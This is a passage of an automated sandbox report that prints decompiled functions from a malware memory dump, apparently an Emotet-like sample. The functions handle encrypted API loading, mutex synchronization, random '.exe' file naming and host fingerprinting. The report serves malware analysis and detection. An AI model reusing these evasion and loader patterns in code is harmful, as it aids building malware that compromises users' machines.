				 *((intOrPtr*)(_t134 - 0x1c)) = 0x4a273656;
				 *((intOrPtr*)(_t134 - 0x18)) = 0xa4faed2a;
				 *((intOrPtr*)(_t134 - 0x14)) = 0x92050cdc;
				 *((intOrPtr*)(_t134 - 0x10)) = 0xc00e3cbd;
				 *((intOrPtr*)(_t134 - 0xc)) = 0x83733fff;
				 *((intOrPtr*)(_t134 - 8)) = 0x631aa631;
				 *((intOrPtr*)(_t134 - 4)) = 0x169152df;
				_t132 = L041D1D10(0x41e2f70, 0x18, __edi, __esi);
				 *0x41e71d8 = LoadLibraryW(_t120);
				L041D1DB0(_t132);
				return E041D1570(_t124,  *0x41e71d8, _t134 - 0x1d8, _t132, 0x76, 0x5139eb75, 0x41e4040);
			}

0x041d6e3a
0x041d6e3a
0x041d6e44
0x041d6e4e
0x041d6e58
0x041d6e62
0x041d6e6c
0x041d6e76
0x041d6e80
0x041d6e8a
0x041d6e94
0x041d6e9e
0x041d6ea8
0x041d6eb2
0x041d6ebc
0x041d6ec6
0x041d6ed0
0x041d6eda
0x041d6ee4
0x041d6eee
0x041d6ef8
0x041d6f02
0x041d6f0c
0x041d6f16
0x041d6f20
0x041d6f2a
0x041d6f34
0x041d6f3e
0x041d6f48
0x041d6f52
0x041d6f5c
0x041d6f66
0x041d6f70
0x041d6f7a
0x041d6f84
0x041d6f8e
0x041d6f98
0x041d6fa2
0x041d6fac
0x041d6fb6
0x041d6fc0
0x041d6fca
0x041d6fd4
0x041d6fde
0x041d6fe8
0x041d6ff2
0x041d6ffc
0x041d7006
0x041d7010
0x041d701a
0x041d7024
0x041d702e
0x041d7038
0x041d7042
0x041d704c
0x041d7056
0x041d7060
0x041d706a
0x041d7074
0x041d707e
0x041d7088
0x041d7092
0x041d709c
0x041d70a6
0x041d70b0
0x041d70ba
0x041d70c4
0x041d70ce
0x041d70d8
0x041d70e2
0x041d70ec
0x041d70f6
0x041d7100
0x041d710a
0x041d7114
0x041d711e
0x041d7128
0x041d7132
0x041d713c
0x041d7146
0x041d7150
0x041d715a
0x041d7164
0x041d7173
0x041d717d
0x041d7187
0x041d7191
0x041d719b
0x041d71a5
0x041d71ac
0x041d71b3
0x041d71ba
0x041d71c1
0x041d71c8
0x041d71cf
0x041d71d6
0x041d71dd
0x041d71e4
0x041d71eb
0x041d71f2
0x041d71f9
0x041d7200
0x041d7207
0x041d720e
0x041d7215
0x041d721c
0x041d7223
0x041d722a
0x041d7231
0x041d7238
0x041d723f
0x041d7246
0x041d724d
0x041d7254
0x041d725b
0x041d7262
0x041d7269
0x041d7270
0x041d7277
0x041d727e
0x041d728d
0x041d7298
0x041d729d
0x041d72c6

APIs

LoadLibraryW.KERNEL32(00000000), ref: 041D7290

Strings

yfH, xrefs: 041D71E4
?&8, xrefs: 041D6EE4
V6'J, xrefs: 041D7254
D, xrefs: 041D6E6C

Memory Dump Source

Source File: 00000000.00000002.655519273.00000000041D1000.00000020.00000001.sdmp, Offset: 041D0000, based on PE: true

Associated: 00000000.00000002.655514422.00000000041D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.655533816.00000000041E1000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.655540744.00000000041E2000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41d0000_emo.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: ?&8$V6'J$yfH$D
API String ID: 1029625771-2647291396
Opcode ID: de909278e465e9ab31b22a3c40c6f9975520fbe426048891e46f114d912dedb7
Instruction ID: ba2242c667b8222b632ea1a10f1c7d7c5df667222bd367eafc5f36a7fd43c303
Opcode Fuzzy Hash: de909278e465e9ab31b22a3c40c6f9975520fbe426048891e46f114d912dedb7
Instruction Fuzzy Hash: 05A1A8B4C4936C9FEB608F829A857CDBA71FB12344F6086C8C5693F614CB754A82CF95

Uniqueness

Uniqueness Score: -1.00%

Function 041DCCB0, Relevance: 7.5, APIs: 5, Instructions: 37
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E041DCCB0(void* __eflags) {
				void* __esi;
				void* _t1;
				long _t4;
				long _t9;
				void* _t11;
				void* _t12;
				void* _t13;
				int _t14;

				_t14 = 0;
				if(L041DCB90(_t1, _t11, _t12, _t13, 0) != 0) {
					_t4 = WaitForSingleObject( *0x41e4418, 0);
					if(_t4 == 0 || _t4 == 0x80) {
						if(L041DCBF0(_t4, _t11, _t12, _t13, _t14) != 0) {
							if(L041DCC50(_t5, _t11, _t12, _t13, _t14) != 0) {
								_t9 = SignalObjectAndWait( *0x41e421c,  *0x41e4218, 0xffffffff, 0);
								if(_t9 == 0 || _t9 == 0x80) {
									_t14 = ResetEvent( *0x41e421c);
								}
							}
							ReleaseMutex( *0x41e4418);
							CloseHandle( *0x41e4418);
						}
					}
				}
				return _t14;
			}

0x041dccb1
0x041dccba
0x041dccc3
0x041dcccb
0x041dccdb
0x041dcce4
0x041dccf6
0x041dccfe
0x041dcd13
0x041dcd13
0x041dccfe
0x041dcd1b
0x041dcd27
0x041dcd27
0x041dccdb
0x041dcccb
0x041dcd30

APIs

WaitForSingleObject.KERNEL32(00000000), ref: 041DCCC3
SignalObjectAndWait.KERNEL32(000000FF,00000000), ref: 041DCCF6
ResetEvent.KERNEL32 ref: 041DCD0D
ReleaseMutex.KERNEL32 ref: 041DCD1B
CloseHandle.KERNEL32 ref: 041DCD27

Memory Dump Source

Source File: 00000000.00000002.655519273.00000000041D1000.00000020.00000001.sdmp, Offset: 041D0000, based on PE: true

Associated: 00000000.00000002.655514422.00000000041D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.655533816.00000000041E1000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.655540744.00000000041E2000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41d0000_emo.jbxd

Yara matches

Similarity

API ID: ObjectWait$CloseEventHandleMutexReleaseResetSignalSingle
String ID:
API String ID: 3756552044-0
Opcode ID: adb4c411ef2217d4ced85af6e09a2c5a4c6809f1038813810e97d02d4762a585
Instruction ID: f3c41cd51bd094346d73b85c1cdc407854c04823f0e84baa52c3c69402f37d4b
Opcode Fuzzy Hash: adb4c411ef2217d4ced85af6e09a2c5a4c6809f1038813810e97d02d4762a585
Instruction Fuzzy Hash: 14F0FFBCA015115BDB211BE3FC887553E95EF043A5F1545A0E902D92E0FB29ECC1EBD5

Uniqueness

Uniqueness Score: -1.00%

Function 041D7C6A, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 147
libraryCOMMON

Download Yara Rule

C-Code - Quality: 99%

			E041D7C6A(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t131;
				void* _t141;

				_t131 = __ebx;
				 *((intOrPtr*)(_t141 - 0x1f4)) = 0xf8bc5878;
				 *((intOrPtr*)(_t141 - 0x1f0)) = 0x79854227;
				 *((intOrPtr*)(_t141 - 0x1ec)) = 0x45766011;
				 *((intOrPtr*)(_t141 - 0x1e8)) = 0xc5ef84f5;
				 *((intOrPtr*)(_t141 - 0x1e4)) = 0x8170e46b;
				 *((intOrPtr*)(_t141 - 0x1e0)) = 0x47be9c88;
				 *((intOrPtr*)(_t141 - 0x1dc)) = 0x65d4b5a8;
				 *((intOrPtr*)(_t141 - 0x1d8)) = 0xa08f779d;
				 *((intOrPtr*)(_t141 - 0x1d4)) = 0x64ba5b3f;
				 *((intOrPtr*)(_t141 - 0x1d0)) = 0xf06ce8a3;
				 *((intOrPtr*)(_t141 - 0x1cc)) = 0xbcc4cdf5;
				 *((intOrPtr*)(_t141 - 0x1c8)) = 0x9f24347e;
				 *((intOrPtr*)(_t141 - 0x1c4)) = 0x824d0a33;
				 *((intOrPtr*)(_t141 - 0x1c0)) = 0x9f346a3a;
				 *((intOrPtr*)(_t141 - 0x1bc)) = 0xc0903b02;
				 *((intOrPtr*)(_t141 - 0x1b8)) = 0xfdcbd5e3;
				 *((intOrPtr*)(_t141 - 0x1b4)) = 0x6ea17253;
				 *((intOrPtr*)(_t141 - 0x1b0)) = 0xd1ad9674;
				 *((intOrPtr*)(_t141 - 0x1ac)) = 0x3dcfa93c;
				 *((intOrPtr*)(_t141 - 0x1a8)) = 0xc96e9958;
				 *((intOrPtr*)(_t141 - 0x1a4)) = 0x75f82e86;
				 *((intOrPtr*)(_t141 - 0x1a0)) = 0x66730c53;
				 *((intOrPtr*)(_t141 - 0x19c)) = 0xa7769c3b;
				 *((intOrPtr*)(_t141 - 0x198)) = 0x44887a47;
				 *((intOrPtr*)(_t141 - 0x194)) = 0x4b63b12d;
				 *((intOrPtr*)(_t141 - 0x190)) = 0x6f3c59ed;
				 *((intOrPtr*)(_t141 - 0x18c)) = 0xba34ab4f;
				 *((intOrPtr*)(_t141 - 0x188)) = 0x7788338f;
				 *((intOrPtr*)(_t141 - 0x184)) = 0xb462f585;
				 *((intOrPtr*)(_t141 - 0x180)) = 0x8a60cb05;
				 *((intOrPtr*)(_t141 - 0x17c)) = 0xab4aa99a;
				 *((intOrPtr*)(_t141 - 0x178)) = 0x60f7e74e;
				 *((intOrPtr*)(_t141 - 0x174)) = 0xa507aa68;
				 *((intOrPtr*)(_t141 - 0x170)) = 0x80a8997e;
				 *((intOrPtr*)(_t141 - 0x16c)) = 0x57be0c33;
				 *((intOrPtr*)(_t141 - 0x168)) = 0xfee474af;
				 *((intOrPtr*)(_t141 - 0x164)) = 0xfb3b3002;
				 *((intOrPtr*)(_t141 - 0x160)) = 0xeec3536b;
				 *((intOrPtr*)(_t141 - 0x15c)) = 0xea0e5964;
				 *((intOrPtr*)(_t141 - 0x158)) = 0x1bbeda24;
				 *((intOrPtr*)(_t141 - 0x154)) = 0x4fce9e0f;
				 *((intOrPtr*)(_t141 - 0x150)) = 0xd88914e2;
				 *((intOrPtr*)(_t141 - 0x14c)) = 0x1cadb6bb;
				 *((intOrPtr*)(_t141 - 0x148)) = 0xb132df34;
				 *((intOrPtr*)(_t141 - 0x144)) = 0xc4459303;
				 *((intOrPtr*)(_t141 - 0x140)) = 0x46584ba5;
				 *((intOrPtr*)(_t141 - 0x13c)) = 0x5317af;
				 *((intOrPtr*)(_t141 - 0x138)) = 0x4b99a86f;
				 *((intOrPtr*)(_t141 - 0x134)) = 0xa24695f7;
				 *((intOrPtr*)(_t141 - 0x130)) = 0xb165285a;
				 *((intOrPtr*)(_t141 - 0x12c)) = 0xd2a3a96b;
				 *((intOrPtr*)(_t141 - 0x128)) = 0xcc478d16;
				 *((intOrPtr*)(_t141 - 0x124)) = 0x1707e491;
				 *((intOrPtr*)(_t141 - 0x120)) = 0x859a6f02;
				 *((intOrPtr*)(_t141 - 0x11c)) = 0xdd8d92e2;
				 *((intOrPtr*)(_t141 - 0x118)) = 0xe794bcf8;
				 *((intOrPtr*)(_t141 - 0x114)) = 0x3b51c1aa;
				 *((intOrPtr*)(_t141 - 0x110)) = 0x86db06e9;
				 *((intOrPtr*)(_t141 - 0x10c)) = 0xfb85d0f3;
				 *((intOrPtr*)(_t141 - 0x108)) = 0x61fbefea;
				 *((intOrPtr*)(_t141 - 0x104)) = 0x26135710;
				 *((intOrPtr*)(_t141 - 0x100)) = 0x4ba589f3;
				 *((intOrPtr*)(_t141 - 0xfc)) = 0x7f22691f;
				 *((intOrPtr*)(_t141 - 0xf8)) = 0xbd62057d;
				 *((intOrPtr*)(_t141 - 0xf4)) = 0x6207d963;
				 *((intOrPtr*)(_t141 - 0xf0)) = 0xcc825023;
				 *((intOrPtr*)(_t141 - 0xec)) = 0x534c78de;
				 *((intOrPtr*)(_t141 - 0xe8)) = 0xb931b9a4;
				 *((intOrPtr*)(_t141 - 0xe4)) = 0x338b18e6;
				 *((intOrPtr*)(_t141 - 0xe0)) = 0x1c7db376;
				 *((intOrPtr*)(_t141 - 0xdc)) = 0x7ad1956d;
				 *((intOrPtr*)(_t141 - 0xd8)) = 0x8a268700;
				 *((intOrPtr*)(_t141 - 0xd4)) = 0xc67ccd3c;
				 *((intOrPtr*)(_t141 - 0xd0)) = 0xe1973f53;
				 *((intOrPtr*)(_t141 - 0xcc)) = 0x7d12a504;
				 *((intOrPtr*)(_t141 - 0xc8)) = 0x8449357d;
				 *((intOrPtr*)(_t141 - 0xc4)) = 0x210531f1;
				 *((intOrPtr*)(_t141 - 0xc0)) = 0xfb57d59;
				 *((intOrPtr*)(_t141 - 0xbc)) = 0x58e4b3ba;
				 *((intOrPtr*)(_t141 - 0xb8)) = 0x979e3b02;
				_push(0x10f9141c);
				 *((intOrPtr*)(_t141 - 0xb4)) = 0x59216394;
				 *((intOrPtr*)(_t141 - 0xb0)) = 0xe9ec070b;
				 *((intOrPtr*)(_t141 - 0xac)) = 0x1d968333;
				 *((intOrPtr*)(_t141 - 0xa8)) = 0xc1991ff1;
				 *((intOrPtr*)(_t141 - 0xa4)) = 0x5c23a8c4;
				 *((intOrPtr*)(_t141 - 0xa0)) = 0x9cf69a1f;
				 *((intOrPtr*)(_t141 - 0x9c)) = 0x2e5cf8a;
				 *((intOrPtr*)(_t141 - 0x98)) = 0xe9583f9c;
				 *((intOrPtr*)(_t141 - 0x94)) = 0xa9a3ca4f;
				 *((intOrPtr*)(_t141 - 0x90)) = 0xe3f82e3c;
				 *((intOrPtr*)(_t141 - 0x8c)) = 0x1626b69f;
				 *((intOrPtr*)(_t141 - 0x88)) = 0x7c3a6172;
				 *((intOrPtr*)(_t141 - 0x84)) = 0xe1ab4a9e;
				 *((intOrPtr*)(_t141 - 0x80)) = 0x477f6349;
				 *((intOrPtr*)(_t141 - 0x7c)) = 0xb497fc7e;
				 *((intOrPtr*)(_t141 - 0x78)) = 0x262ee3f1;
				 *((intOrPtr*)(_t141 - 0x74)) = 0x6f16f92b;
				 *((intOrPtr*)(_t141 - 0x70)) = 0x131bd118;
				 *((intOrPtr*)(_t141 - 0x6c)) = 0x98eaf895;
				 *((intOrPtr*)(_t141 - 0x68)) = 0x6aa6ef29;
				 *((intOrPtr*)(_t141 - 0x64)) = 0x5a6620f5;
				 *((intOrPtr*)(_t141 - 0x60)) = 0x7a53ec17;
				 *((intOrPtr*)(_t141 - 0x5c)) = 0x9893970d;
				 *((intOrPtr*)(_t141 - 0x58)) = 0xbd0b2170;
				 *((intOrPtr*)(_t141 - 0x54)) = 0xb31f2ee7;
				 *((intOrPtr*)(_t141 - 0x50)) = 0xf25afd91;
				 *((intOrPtr*)(_t141 - 0x4c)) = 0x2864793a;
				 *((intOrPtr*)(_t141 - 0x48)) = 0x9e20faa;
				 *((intOrPtr*)(_t141 - 0x44)) = 0x1b3c84a3;
				 *((intOrPtr*)(_t141 - 0x40)) = 0x96f0b6e;
				 *((intOrPtr*)(_t141 - 0x3c)) = 0xe14ba772;
				 *((intOrPtr*)(_t141 - 0x38)) = 0xc00ca76f;
				 *((intOrPtr*)(_t141 - 0x34)) = 0xecbbc305;
				 *((intOrPtr*)(_t141 - 0x30)) = 0xe1924f16;
				 *((intOrPtr*)(_t141 - 0x2c)) = 0x4c76fddd;
				 *((intOrPtr*)(_t141 - 0x28)) = 0x1fefe41e;
				 *((intOrPtr*)(_t141 - 0x24)) = 0xfe379b1c;
				 *((intOrPtr*)(_t141 - 0x20)) = 0x38a6ab12;
				 *((intOrPtr*)(_t141 - 0x1c)) = 0xdee6ced2;
				 *((intOrPtr*)(_t141 - 0x18)) = 0x5d98300b;
				 *((intOrPtr*)(_t141 - 0x14)) = 0xd971e302;
				 *((intOrPtr*)(_t141 - 0x10)) = 0x2d135426;
				 *((intOrPtr*)(_t141 - 0xc)) = 0xf84208f;
				 *((intOrPtr*)(_t141 - 8)) = 0xa4538f2a;
				 *((intOrPtr*)(_t141 - 4)) = 0x33da5190;
				_t139 = L041D1D10(0x41e2e20, 0x150, __edi, __esi);
				 *0x41e71e0 = LoadLibraryW(_t127);
				L041D1DB0(_t139);
				return E041D1570(_t131,  *0x41e71e0, _t141 - 0x1f4, _t139, 0x7d, 0x1dc051b6, 0x41e4220);
			}

0x041d7c6a
0x041d7c6a
0x041d7c74
0x041d7c7e
0x041d7c88
0x041d7c92
0x041d7c9c
0x041d7ca6
0x041d7cb0
0x041d7cba
0x041d7cc4
0x041d7cce
0x041d7cd8
0x041d7ce2
0x041d7cec
0x041d7cf6
0x041d7d00
0x041d7d0a
0x041d7d14
0x041d7d1e
0x041d7d28
0x041d7d32
0x041d7d3c
0x041d7d46
0x041d7d50
0x041d7d5a
0x041d7d64
0x041d7d6e
0x041d7d78
0x041d7d82
0x041d7d8c
0x041d7d96
0x041d7da0
0x041d7daa
0x041d7db4
0x041d7dbe
0x041d7dc8
0x041d7dd2
0x041d7ddc
0x041d7de6
0x041d7df0
0x041d7dfa
0x041d7e04
0x041d7e0e
0x041d7e18
0x041d7e22
0x041d7e2c
0x041d7e36
0x041d7e40
0x041d7e4a
0x041d7e54
0x041d7e5e
0x041d7e68
0x041d7e72
0x041d7e7c
0x041d7e86
0x041d7e90
0x041d7e9a
0x041d7ea4
0x041d7eae
0x041d7eb8
0x041d7ec2
0x041d7ecc
0x041d7ed6
0x041d7ee0
0x041d7eea
0x041d7ef4
0x041d7efe
0x041d7f08
0x041d7f12
0x041d7f1c
0x041d7f26
0x041d7f30
0x041d7f3a
0x041d7f44
0x041d7f4e
0x041d7f58
0x041d7f62
0x041d7f6c
0x041d7f76
0x041d7f80
0x041d7f8a
0x041d7f94
0x041d7fa3
0x041d7fad
0x041d7fb7
0x041d7fc1
0x041d7fcb
0x041d7fd5
0x041d7fdf
0x041d7fe9
0x041d7ff3
0x041d7ffd
0x041d8007
0x041d8011
0x041d801b
0x041d8022
0x041d8029
0x041d8030
0x041d8037
0x041d803e
0x041d8045
0x041d804c
0x041d8053
0x041d805a
0x041d8061
0x041d8068
0x041d806f
0x041d8076
0x041d807d
0x041d8084
0x041d808b
0x041d8092
0x041d8099
0x041d80a0
0x041d80a7
0x041d80ae
0x041d80b5
0x041d80bc
0x041d80c3
0x041d80ca
0x041d80d1
0x041d80d8
0x041d80df
0x041d80e6
0x041d80ed
0x041d80f4
0x041d8103
0x041d810e
0x041d8113
0x041d813c

APIs

LoadLibraryW.KERNEL32(00000000), ref: 041D8106

Strings

ra:|, xrefs: 041D8007
:yd(, xrefs: 041D8076
Y<o, xrefs: 041D7D64

Memory Dump Source

Source File: 00000000.00000002.655519273.00000000041D1000.00000020.00000001.sdmp, Offset: 041D0000, based on PE: true

Associated: 00000000.00000002.655514422.00000000041D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.655533816.00000000041E1000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.655540744.00000000041E2000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41d0000_emo.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: :yd($ra:|$Y<o
API String ID: 1029625771-1249044168
Opcode ID: 29ef2524f2a3aee23f67a21439745654b3f387a2d2cf8634139fce395a4619cc
Instruction ID: 26f43f69d85ff0718842be40215166c4864d719a1b49db7c6edb33cdc14c8fec
Opcode Fuzzy Hash: 29ef2524f2a3aee23f67a21439745654b3f387a2d2cf8634139fce395a4619cc
Instruction Fuzzy Hash: 39B1B7B4C49369DBEB20CF829A817DDBA71FB06304F6081C8D5993B215DB740A86CF86

Uniqueness

Uniqueness Score: -1.00%

Function 041DFA30, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E041DFA30(WCHAR* __ecx) {
				WCHAR* _t19;
				signed int _t23;
				signed int _t24;
				signed int _t25;
				void* _t28;

				_t19 = __ecx;
				lstrcpyW(__ecx, 0x41e7748);
				_t23 = lstrlenW(_t19);
				_t19[_t23] = 0x5c;
				_t24 = _t23 + 1;
				_t28 = (GetTickCount() & 0x0000000f) + 4;
				L041D21E0( &(_t19[_t24]), _t28);
				_t25 = _t24 + _t28;
				_t19[_t25] = 0x65002e;
				 *((intOrPtr*)(_t19 + 4 + _t25 * 2)) = 0x650078;
				 *((short*)(_t19 + 8 + _t25 * 2)) = 0;
				return 0;
			}

0x041dfa33
0x041dfa3b
0x041dfa48
0x041dfa4f
0x041dfa53
0x041dfa62
0x041dfa67
0x041dfa6c
0x041dfa70
0x041dfa77
0x041dfa7f
0x041dfa87

APIs

lstrcpyW.KERNEL32(?,041E7748), ref: 041DFA3B
lstrlenW.KERNEL32(?,?,041E7748), ref: 041DFA42
GetTickCount.KERNEL32 ref: 041DFA54

Strings

x, xrefs: 041DFA77

Memory Dump Source

Source File: 00000000.00000002.655519273.00000000041D1000.00000020.00000001.sdmp, Offset: 041D0000, based on PE: true

Associated: 00000000.00000002.655514422.00000000041D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.655533816.00000000041E1000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.655540744.00000000041E2000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41d0000_emo.jbxd

Yara matches

Similarity

API ID: CountTicklstrcpylstrlen
String ID: x
API String ID: 974621299-2363233923
Opcode ID: f2fc63037887a12a78f015ba90857ef7f8dde391673c51d9a2c108bcbbfab69f
Instruction ID: a2980de531ef128de8c6b77cefbe4ca48d657e997c56c81bbdabeb83cffb91cf
Opcode Fuzzy Hash: f2fc63037887a12a78f015ba90857ef7f8dde391673c51d9a2c108bcbbfab69f
Instruction Fuzzy Hash: E5F0E5BBA05355ABD7105FE2DCC85163799EF88352B0550B5ED05DF206EB78CC8187E0

Uniqueness

Uniqueness Score: -1.00%

Function 041DD119, Relevance: 6.0, APIs: 4, Instructions: 38synchronizationCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 041DD119
GetTickCount.KERNEL32 ref: 041DD127
GetTickCount.KERNEL32 ref: 041DD138
WaitForSingleObject.KERNEL32(00000000,?,00000000), ref: 041DD18C

Memory Dump Source

Source File: 00000000.00000002.655519273.00000000041D1000.00000020.00000001.sdmp, Offset: 041D0000, based on PE: true

Associated: 00000000.00000002.655514422.00000000041D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.655533816.00000000041E1000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.655540744.00000000041E2000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41d0000_emo.jbxd

Yara matches

Similarity

API ID: CountTick$ObjectSingleWait
String ID:
API String ID: 2051767920-0
Opcode ID: cbaa372e831c6ba334e0cb6e4f573c8114e893761cba9d8f95083d247dc1c8c3
Instruction ID: c20ef285b09faab6dbb1b5a200323e023a616157b3f327561d5330f08bfd3ef1
Opcode Fuzzy Hash: cbaa372e831c6ba334e0cb6e4f573c8114e893761cba9d8f95083d247dc1c8c3
Instruction Fuzzy Hash: 59016DB9A00201EBE7049BE3FC8CB6D3A7AFB08709F454014F212E9180DBBC9CC29B44

Uniqueness

Uniqueness Score: -1.00%

Function 041D10B7, Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(?,00000001,?,?), ref: 041D10F1
SetEvent.KERNEL32(00000000,?,00000001,?,?), ref: 041D10FE
CloseHandle.KERNEL32(00000000,?,00000001,?,?), ref: 041D1105
CloseHandle.KERNEL32(00000000), ref: 041D1111

Memory Dump Source

Source File: 00000000.00000002.655519273.00000000041D1000.00000020.00000001.sdmp, Offset: 041D0000, based on PE: true

Associated: 00000000.00000002.655514422.00000000041D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.655533816.00000000041E1000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.655540744.00000000041E2000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41d0000_emo.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$Create
String ID:
API String ID: 2420982144-0
Opcode ID: 795e042c4a54cb70409dba106df7588d969aa6411a93e81b6f50939c6edf7a31
Instruction ID: 2a3236c331701b6b913c3bf4d8e85d24094cfdae6c37088b79311ebfda7168de
Opcode Fuzzy Hash: 795e042c4a54cb70409dba106df7588d969aa6411a93e81b6f50939c6edf7a31
Instruction Fuzzy Hash: 7CF0E0B9D0051077D7255BE39C88F9E363DDF45744F050290F50A67241DB389EC08BE5

Uniqueness

Uniqueness Score: -1.00%

Function 041DF5CA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E041DF5CA(DWORD* __eax, void* __ebx, void* __esi) {
				unsigned char _t16;
				intOrPtr _t23;
				char* _t24;
				int _t27;
				void* _t33;
				char* _t36;
				void* _t42;
				void* _t44;

				 *(_t42 - 4) = 0x10;
				_t16 = GetComputerNameW(_t42 - 0x34, __eax);
				if(_t16 == 0) {
					L13:
					 *(_t42 - 0x14) = 0x58;
					L14:
					goto 0x41f1b78;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					 *0x41e4d6c(0x41e7438, 0x104, (_t16 >> 0x00000001) + 0xffffff26 ^ 0x041e4aec, _t42 - 0x14);
					return L041D1DB0((_t16 >> 0x00000001) + 0xffffff26 ^ 0x041e4aec);
				}
				_t33 = _t42 - 0x34;
				_t23 = E041D13A0(_t33);
				_push(_t33);
				 *0x41e4ae4 = _t23;
				_t24 = L041D1C80(0x41e3760, 0x2c, __esi);
				_t44 = _t44 + 4;
				_t27 = WideCharToMultiByte(0, 0x400, _t42 - 0x34, 0xffffffff, _t42 - 0x14, 0x10, _t24, 0);
				_t16 = L041D1DB0(_t24);
				if((0 | _t27 > 0x00000000) == 0) {
					goto L13;
				}
				_t36 = _t42 - 0x14;
				if( *(_t42 - 0x14) == 0) {
					goto L14;
				}
				do {
					_t16 =  *_t36;
					if(_t16 < 0x30 || _t16 > 0x39) {
						if(_t16 < 0x61 || _t16 > 0x7a) {
							if(_t16 < 0x41 || _t16 > 0x5a) {
								 *_t36 = 0x58;
							}
						}
					}
					_t36 = _t36 + 1;
				} while ( *_t36 != 0);
				goto L14;
			}

0x041df5ca
0x041df5d6
0x041df5de
0x041df665
0x041df665
0x041df66b
0x041df66b
0x041df670
0x041df671
0x041df672
0x041df673
0x041df692
0x041df6a6
0x041df6a6
0x041df5e5
0x041df5e8
0x041df5ed
0x041df5f3
0x041df5fd
0x041df602
0x041df61d
0x041df62c
0x041df634
0x00000000
0x00000000
0x041df63a
0x041df63d
0x00000000
0x00000000
0x041df640
0x041df640
0x041df644
0x041df64c
0x041df654
0x041df65a
0x041df65a
0x041df654
0x041df64c
0x041df65d
0x041df65e
0x00000000

APIs

GetComputerNameW.KERNEL32(?), ref: 041DF5D6
WideCharToMultiByte.KERNEL32(00000000,00000400,?,000000FF,?,00000010,00000000,00000000), ref: 041DF61D

Strings

X, xrefs: 041DF665

Memory Dump Source

Source File: 00000000.00000002.655519273.00000000041D1000.00000020.00000001.sdmp, Offset: 041D0000, based on PE: true

Associated: 00000000.00000002.655514422.00000000041D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.655533816.00000000041E1000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.655540744.00000000041E2000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41d0000_emo.jbxd

Yara matches

Similarity

API ID: ByteCharComputerMultiNameWide
String ID: X
API String ID: 4013585866-3081909835
Opcode ID: 4ef72ae227b089cfffd0cb5e38abacdd48b01e047792871ff24bc29427693684
Instruction ID: e867aac04392b9c5908f9882b1ae0a806b205192e3fd220f8b344992c52426f6
Opcode Fuzzy Hash: 4ef72ae227b089cfffd0cb5e38abacdd48b01e047792871ff24bc29427693684
Instruction Fuzzy Hash: 11115CF0905149BAFB10DBA5DEC8BEA37A99B09308F100095E143F55E0E764BB47C71A

Uniqueness

Uniqueness Score: -1.00%

Function 041DD059, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 041DD0B0
GetModuleHandleW.KERNEL32(00000000,00000000), ref: 041DD0D0

Strings

0, xrefs: 041DD096

Memory Dump Source

Source File: 00000000.00000002.655519273.00000000041D1000.00000020.00000001.sdmp, Offset: 041D0000, based on PE: true

Associated: 00000000.00000002.655514422.00000000041D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.655533816.00000000041E1000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.655540744.00000000041E2000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41d0000_emo.jbxd

Yara matches

Similarity

API ID: HandleModule
String ID: 0
API String ID: 4139908857-4108050209
Opcode ID: 850a3de82910ee64d3b5346bb47ac796522eb9ea42bf0391f3da630f9a88259f
Instruction ID: 6ebe1bb2d83e75cce54445f666333c8ae9e488b0824a56a6d56577b42f29a6b4
Opcode Fuzzy Hash: 850a3de82910ee64d3b5346bb47ac796522eb9ea42bf0391f3da630f9a88259f
Instruction Fuzzy Hash: 5A1188B5A40218FBEB109BD2DC45FED7679FB04744F200159F705BA280DB747A45CB55

Uniqueness

Uniqueness Score: -1.00%

Function 041DFCA0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32
stringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E041DFCA0(WCHAR* __ecx) {
				WCHAR* _t19;
				signed int _t23;
				signed int _t24;
				signed int _t25;
				void* _t28;

				_t19 = __ecx;
				 *0x41e5284(0, 0x23, 0, 0, __ecx);
				_t23 = lstrlenW(__ecx);
				 *((short*)(_t19 + _t23 * 2)) = 0x5c;
				_t24 = _t23 + 1;
				_t28 = (GetTickCount() & 0x0000000f) + 4;
